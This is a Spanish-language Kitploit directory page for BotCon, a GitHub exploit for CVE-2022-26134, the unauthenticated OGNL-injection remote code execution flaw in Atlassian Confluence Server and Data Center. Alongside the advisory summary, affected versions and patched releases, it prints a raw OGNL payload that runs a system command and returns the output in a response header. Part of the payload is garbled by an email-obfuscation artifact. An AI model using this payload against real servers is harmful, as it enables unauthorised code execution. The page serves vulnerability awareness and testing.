Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
BotCon — [CVE-2022-26134] Attlasian Confluence RCE | Kitploit
Herramientas/GitHubGitHub/keepwannabe/botcon
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubkeepwannabe/botcon

BotCon

[CVE-2022-26134] Attlasian Confluence RCE

Ver Repositorio
31hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

BotCon

Attlasian Confluence Ejecución Remota de Código No Autenticada mediante Inyección OGNL (CVE-2022-26134)

  • El 02 de junio de 2022, Atlassian publicó un aviso de seguridad para sus aplicaciones Confluence Server y Data Center, destacando una vulnerabilidad de ejecución remota de código no autenticada de severidad crítica. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.

¡LEE ESTO!

Úsalo con precaución. Eres responsable de tus acciones. Los desarrolladores no asumen ninguna responsabilidad y no se hacen responsables de ningún uso indebido o daño.

BurpRequest

Payload Crudo

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Detalles del Fallo

  • Producto Afectado :

    • Confluence
      • Confluence Server
      • Confluence Data Center
  • Versiones Afectadas :

    • Todas las versiones soportadas de Confluence Server y Data Center están afectadas.
    • Las versiones de Confluence Server y Data Center posteriores a 1.3.0 están afectadas.

Mitigaciones

  • Actualiza tu versión de Attlasian Confluence a estas versiones corregidas :
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
Descargar herramienta